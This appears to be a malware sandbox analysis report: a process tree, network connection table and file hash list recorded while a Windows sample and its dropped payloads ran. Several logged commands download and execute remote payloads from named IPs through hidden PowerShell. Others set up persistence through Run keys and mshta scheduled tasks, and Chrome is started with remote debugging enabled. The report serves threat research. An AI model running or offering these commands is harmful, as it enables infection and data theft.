C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1036
C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe"
C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe
"C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe"
C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 500
C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef79b9758,0x7fef79b9768,0x7fef79b9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1296 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe
"C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe
"C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3760 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvytlqfl.cmdline"
C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe
"C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe"
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC50A0.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 1216
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2zer-yl.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A80.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5A7F.tmp"
C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe
"C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe"
C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe
"C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe
"C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe"
C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe
"C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe"
C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe
"C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe"
C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe
"C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BGOCQVVKCX0QWYVMYADESIX7SF6FWWAB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "fEiHYmaxCUY" /tr "mshta \"C:\Temp\r2EtpuBU9.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\r2EtpuBU9.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"
C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {9A18A70E-EF90-4148-9E14-42DC99609553} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
C:\ProgramData\nlfqre\ssomfop.exe
C:\ProgramData\nlfqre\ssomfop.exe
C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"
C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 508
C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe
"C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ba9758,0x7fef6ba9768,0x7fef6ba9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1412 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1504 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1584 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1344 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1416,i,2522694191102210692,7210565557500882972,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 104.115.34.42:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 172.67.170.109:443 | circujitstorm.bet | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | 159.69.100.232 | tcp |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| DE | 159.69.100.232:443 | tcp | |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| NL | 45.144.212.77:16000 | tcp | |
| NL | 45.144.212.77:16000 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 162.159.137.232:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 162.159.137.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| DE | 159.69.100.232:443 | tcp | |
| US | 104.21.32.1:443 | tcp | |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 162.159.137.232:443 | tcp | |
| DE | 5.75.210.149:443 | tcp | |
| US | 162.159.137.232:443 | tcp | |
| US | 104.21.32.1:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| SE | 77.239.121.5:1668 | tcp | |
| SE | 77.239.121.5:1668 | tcp | |
| SE | 77.239.121.5:1668 | tcp | |
| DE | 5.75.210.149:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 185.215.113.16:80 | tcp | |
| US | 172.67.170.109:443 | circujitstorm.bet | tcp |
| RU | 185.215.113.16:80 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| US | 172.67.170.109:443 | circujitstorm.bet | tcp |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 159.69.100.232:443 | tcp | |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| DE | 159.69.100.232:443 | tcp | |
| US | 104.21.80.1:443 | exarthynature.run | tcp |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| DE | 159.69.100.232:443 | tcp | |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| GB | 216.58.204.68:443 | tcp | |
| GB | 172.217.169.42:443 | tcp | |
| GB | 172.217.169.42:443 | udp | |
| GB | 142.250.200.46:443 | tcp | |
| GB | 142.250.200.46:443 | udp |
Files
memory/2904-1-0x0000000000250000-0x0000000000251000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
| MD5 | a92d6465d69430b38cbc16bf1c6a7210 |
| SHA1 | 421fadebee484c9d19b9cb18faf3b0f5d9b7a554 |
| SHA256 | 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77 |
| SHA512 | 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar12DC.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
| MD5 | e57abfb943046d58904ecc3f815a56e4 |
| SHA1 | e800da3745d132ac518eb622aa70ac90eafbf0be |
| SHA256 | e949b31e10226a92ad6dab5ddda7a2da4f0c0eb9f2a2ee4de18700997af10aa1 |
| SHA512 | 7fe899c6145e945299daf0a5f473534c7f49aa96bf4f0e33a1f704d01dfc9aad53fc6628e8a2893b1838c1bd4d9abbad71fdafb74cdbea7c020bb99f5bd35657 |
\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
| MD5 | 6ee5f7f9f0016b5cc4f93a949a08f0dc |
| SHA1 | eafed63c2d271a607380788f2407d86529ae3f85 |
| SHA256 | dcc88bf0cfe7aa2c059d0f92f351627e8b38b6fdb2c85cb5a31a444bb0a6fba3 |
| SHA512 | b70980c1565e8060046949b4dfeb6fe75b210ded66e51c56a7f34d274a29159f06f89fcf863eb776e0729e3554e82d7923f8bbd1fac97a0d05d08ea5a6709e2f |
C:\Users\Admin\AppData\Local\Temp\rtl280.bpl
| MD5 | fcdf410c77a83f042590c29280b39f52 |
| SHA1 | c702ff6526e509b22c5659e6f7eeee1a38909a9e |
| SHA256 | 08941c5fa519f9dffba137a2a4844e9063ed71bc0c881fb7643e67fb3e3ddb0a |
| SHA512 | bc68982570c27c859d1eaa06191058d23889d10f25279eb2e8130af715a50e3fe1b0b7aceb5d64e90f7e102ba3aa4bdc6c2c7705bab4bd55e24d5f5884211fb7 |
C:\Users\Admin\AppData\Local\Temp\vcl280.bpl
| MD5 | ed87006e77fe6c3d027d0daedf08839b |
| SHA1 | 7436a04d79fd350f03d0c99beff703383a386f42 |
| SHA256 | b61008b8f4396c6a22c7ab7826936b22791882e1057fe4dff7af69032a15ad35 |
| SHA512 | ad520da44a77323498f79c4841ac5f3f73821bf0fab33985f201196462fda9721176b12d7c3ae106ae53b49d50349d74edda793ea6631c99cdf5bf27cec95535 |
C:\Users\Admin\AppData\Local\Temp\web.rtf
| MD5 | 4add81e53e9c5214d6a9a52842724b41 |
| SHA1 | 58e231efbf4004644e25739eb6d0bdfdd952cefe |
| SHA256 | 480ed6da79c231d6f4dbb24833315d03e88dbe68003644657a15bb91fdebbea3 |
| SHA512 | b83585c02cfd3f10982de83327df4129dd8639fcff42345a67ed1dea80c04ee84ad8971814c1c64b415ebf25bc938cbde27d665e7dce26354c3db14d3050f8f9 |
C:\Users\Admin\AppData\Local\Temp\attempt.pkg
